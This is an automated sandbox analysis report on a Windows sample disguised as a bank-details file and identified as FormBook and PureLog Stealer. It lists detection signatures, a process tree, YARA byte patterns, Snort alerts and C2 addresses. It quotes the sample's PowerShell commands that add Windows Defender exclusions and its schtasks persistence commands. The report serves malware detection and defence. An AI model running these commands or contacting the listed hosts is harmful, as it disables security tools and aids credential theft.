Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BANK DETAILS CORRECTIONS.exe

Overview

General Information

Sample name:BANK DETAILS CORRECTIONS.exe
Analysis ID:1411001
MD5:6b3d6565f98f00436cf229258a5ac2c8
SHA1:6fd6b3e765c4e2d6c262e48f3da8040f2f72e41c
SHA256:d48e76a16a20d4af37091f9dea89ce3fa2341e273a3898ac1b8b398c2a5793d5
Tags:exe
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • BANK DETAILS CORRECTIONS.exe (PID: 7616 cmdline: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe MD5: 6B3D6565F98F00436CF229258A5AC2C8)
    • powershell.exe (PID: 7864 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7932 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7284 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7964 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpB1A6.tmp MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • BANK DETAILS CORRECTIONS.exe (PID: 8160 cmdline: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe MD5: 6B3D6565F98F00436CF229258A5AC2C8)
      • EnKifmZDGZ.exe (PID: 5736 cmdline: "C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sdiagnhost.exe (PID: 7656 cmdline: C:\Windows\SysWOW64\sdiagnhost.exe MD5: 76676F0A21E6AF109845151B3CEFE211)
          • EnKifmZDGZ.exe (PID: 6128 cmdline: "C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6348 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • fcLfLlfpmjf.exe (PID: 7212 cmdline: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe MD5: 6B3D6565F98F00436CF229258A5AC2C8)
    • schtasks.exe (PID: 8140 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpC983.tmp MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • fcLfLlfpmjf.exe (PID: 7872 cmdline: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe MD5: 6B3D6565F98F00436CF229258A5AC2C8)
      • EnKifmZDGZ.exe (PID: 1992 cmdline: "C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sdiagnhost.exe (PID: 7628 cmdline: C:\Windows\SysWOW64\sdiagnhost.exe MD5: 76676F0A21E6AF109845151B3CEFE211)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000015.00000002.3734033514.00000000028F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000015.00000002.3734033514.00000000028F0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2b0a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x152df:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2e6a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x188e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000019.00000002.3736975919.0000000005360000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 21 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        13.2.fcLfLlfpmjf.exe.28a731c.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          13.2.fcLfLlfpmjf.exe.28a731c.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            0.2.BANK DETAILS CORRECTIONS.exe.2dd733c.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              12.2.BANK DETAILS CORRECTIONS.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                12.2.BANK DETAILS CORRECTIONS.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
                • 0x2e6a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
                • 0x188e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
                Click to see the 5 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, ParentImage: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, ParentProcessId: 7616, ParentProcessName: BANK DETAILS CORRECTIONS.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, ProcessId: 7864, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, ParentImage: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, ParentProcessId: 7616, ParentProcessName: BANK DETAILS CORRECTIONS.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, ProcessId: 7864, ProcessName: powershell.exe
                Sigma detected: Suspicious Add Scheduled Task Parent
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpC983.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpC983.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe, ParentImage: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe, ParentProcessId: 7212, ParentProcessName: fcLfLlfpmjf.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpC983.tmp, ProcessId: 8140, ProcessName: schtasks.exe
                Sigma detected: Suspicious Schtasks From Env Var Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpB1A6.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpB1A6.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, ParentImage: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, ParentProcessId: 7616, ParentProcessName: BANK DETAILS CORRECTIONS.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpB1A6.tmp, ProcessId: 7964, ProcessName: schtasks.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, ParentImage: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, ParentProcessId: 7616, ParentProcessName: BANK DETAILS CORRECTIONS.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, ProcessId: 7864, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Sigma detected: Scheduled temp file as task from temp location
                Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpB1A6.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpB1A6.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, ParentImage: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe, ParentProcessId: 7616, ParentProcessName: BANK DETAILS CORRECTIONS.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpB1A6.tmp, ProcessId: 7964, ProcessName: schtasks.exe

                Snort Signatures

                Timestamp:03/18/24-14:49:23.116360
                SID:2855465
                Source Port:49764
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:47:24.864581
                SID:2855464
                Source Port:49734
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:47:45.037863
                SID:2855465
                Source Port:49740
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:49:15.008940
                SID:2855464
                Source Port:49761
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:49:00.929117
                SID:2855464
                Source Port:49757
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:47:36.204871
                SID:2855464
                Source Port:49737
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:46:47.390741
                SID:2855465
                Source Port:49724
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:48:41.640265
                SID:2855465
                Source Port:49756
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:46:38.541470
                SID:2855464
                Source Port:49721
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:48:07.754865
                SID:2855464
                Source Port:49746
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:48:22.873091
                SID:2855464
                Source Port:49750
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:47:15.585177
                SID:2855465
                Source Port:49732
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:46:41.234545
                SID:2855464
                Source Port:49722
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:47:30.526801
                SID:2855465
                Source Port:49736
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:48:36.357367
                SID:2855464
                Source Port:49754
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:47:22.032780
                SID:2855464
                Source Port:49733
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:47:53.290655
                SID:2855464
                Source Port:49742
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:46:06.415073
                SID:2855465
                Source Port:49715
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:46:26.987706
                SID:2855464
                Source Port:49717
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:48:28.230214
                SID:2855465
                Source Port:49752
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:49:17.708078
                SID:2855464
                Source Port:49762
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:47:39.612848
                SID:2855464
                Source Port:49738
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:48:14.519924
                SID:2855465
                Source Port:49748
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:48:05.006691
                SID:2855464
                Source Port:49745
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:47:59.248907
                SID:2855465
                Source Port:49744
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:48:20.193872
                SID:2855464
                Source Port:49749
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:46:52.992602
                SID:2855464
                Source Port:49725
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:46:32.650841
                SID:2855465
                Source Port:49719
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:47:02.369576
                SID:2855465
                Source Port:49728
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:46:23.153101
                SID:2855464
                Source Port:49716
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:49:03.754472
                SID:2855464
                Source Port:49758
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:46:55.688066
                SID:2855464
                Source Port:49726
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:47:07.758224
                SID:2855464
                Source Port:49729
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:49:09.406211
                SID:2855465
                Source Port:49760
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:47:50.648512
                SID:2855464
                Source Port:49741
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:48:33.723190
                SID:2855464
                Source Port:49753
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/18/24-14:47:10.366529
                SID:2855464
                Source Port:49730
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.nikazo.xyz/e6xn/Avira URL Cloud: Label: phishing
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeReversingLabs: Detection: 71%
                Multi AV Scanner detection for submitted file
                Source: BANK DETAILS CORRECTIONS.exeReversingLabs: Detection: 71%
                Yara detected FormBook
                Source: Yara matchFile source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000015.00000002.3734033514.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000019.00000002.3736975919.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.1418327028.0000000001860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.3731748977.0000000002320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.1517319906.0000000002900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.3733947362.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.1513647922.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.3733999861.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.3734431266.0000000002C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.1420663413.0000000002880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: BANK DETAILS CORRECTIONS.exeJoe Sandbox ML: detected
                Source: BANK DETAILS CORRECTIONS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: BANK DETAILS CORRECTIONS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: firefox.pdbP source: sdiagnhost.exe, 00000015.00000003.1678729235.0000000007E26000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EnKifmZDGZ.exe, 00000011.00000002.3731777625.00000000001CE000.00000002.00000001.01000000.0000000D.sdmp, EnKifmZDGZ.exe, 00000016.00000000.1383056576.00000000001CE000.00000002.00000001.01000000.0000000D.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3731787865.00000000001CE000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: wntdll.pdbUGP source: BANK DETAILS CORRECTIONS.exe, 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3734603384.00000000045DE000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1420258806.0000000004297000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1415103726.00000000040E0000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3734603384.0000000004440000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000002.1517559243.0000000004A50000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000003.1512263789.00000000048A4000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000003.1510099441.00000000046FB000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000002.1517559243.0000000004BEE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: hBWP.pdbSHA256 source: BANK DETAILS CORRECTIONS.exe, fcLfLlfpmjf.exe.0.dr
                Source: Binary string: wntdll.pdb source: BANK DETAILS CORRECTIONS.exe, BANK DETAILS CORRECTIONS.exe, 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3734603384.00000000045DE000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1420258806.0000000004297000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1415103726.00000000040E0000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3734603384.0000000004440000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000002.1517559243.0000000004A50000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000003.1512263789.00000000048A4000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000003.1510099441.00000000046FB000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000002.1517559243.0000000004BEE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: sdiagnhost.pdb source: BANK DETAILS CORRECTIONS.exe, 0000000C.00000002.1416407629.00000000013C8000.00000004.00000020.00020000.00000000.sdmp, EnKifmZDGZ.exe, 00000011.00000002.3733392609.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, fcLfLlfpmjf.exe, 00000014.00000002.1510220095.0000000001088000.00000004.00000020.00020000.00000000.sdmp, EnKifmZDGZ.exe, 00000016.00000002.3733440957.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: hBWP.pdb source: BANK DETAILS CORRECTIONS.exe, fcLfLlfpmjf.exe.0.dr
                Source: Binary string: firefox.pdb source: sdiagnhost.exe, 00000015.00000003.1678729235.0000000007E26000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sdiagnhost.pdbGCTL source: BANK DETAILS CORRECTIONS.exe, 0000000C.00000002.1416407629.00000000013C8000.00000004.00000020.00020000.00000000.sdmp, EnKifmZDGZ.exe, 00000011.00000002.3733392609.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, fcLfLlfpmjf.exe, 00000014.00000002.1510220095.0000000001088000.00000004.00000020.00020000.00000000.sdmp, EnKifmZDGZ.exe, 00000016.00000002.3733440957.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 4x nop then jmp 076DBD8Dh0_2_076DB423
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 4x nop then jmp 06F8B065h13_2_06F8A6FB

                Networking

                barindex
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49715 -> 149.88.64.51:80
                Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49716 -> 47.76.88.64:80
                Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49717 -> 47.76.88.64:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49719 -> 47.76.88.64:80
                Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49721 -> 144.76.75.181:80
                Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49722 -> 144.76.75.181:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49724 -> 144.76.75.181:80
                Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49725 -> 64.190.62.22:80
